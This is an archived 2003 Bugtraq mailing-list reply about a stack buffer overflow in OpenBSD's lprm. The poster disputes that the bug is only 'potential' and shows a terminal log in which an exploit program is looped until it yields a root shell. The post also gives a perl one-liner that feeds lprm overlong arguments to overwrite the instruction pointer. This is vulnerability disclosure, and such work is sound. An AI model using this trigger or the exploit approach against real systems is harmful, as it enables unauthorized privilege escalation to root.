| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.33.0303052151590.1402-100000@juneof44.hoover> Date: Wed, 5 Mar 2003 21:58:54 -0800 (PST) From: noir sin <noir@...mpos.org> To: <bugtraq@...urityfocus.com> Subject: Re: potential buffer overflow in lprm (fwd) > A bounds check that was added to lprm in 1996 does its checking too > late to be effective. Because of the insufficient check, it may > be possible for a local user to exploit lprm to gain elevated > privileges. It is not know at this time whether or not the bug is > actually exploitable. a real funny stack overflow! if you got a valid printer setup its instant root! there is nothing "potential" about this, it is uid=0 ;pPp bash-2.05a$ id uid=1000(noir) gid=10(users) groups=10(users) bash-2.05a$ while `test .`; do ./lprm_ex; done lp: unknown printer Segmentation fault lp: unknown printer Segmentation fault lp: unknown printer Segmentation fault lp: unknown printer # id uid=1000(noir) euid=0(root) gid=10(users) egid=1(daemon) groups=10(users) # uname -a OpenBSD kernfu 3.1 conf#0 i386 # to repro: lprm -Pvalid_printer_name `perl -e 'print "A"x512'` `perl -e 'print "A"x518'` this shall get you eip = 0x41414141
Powered by blists - more mailing lists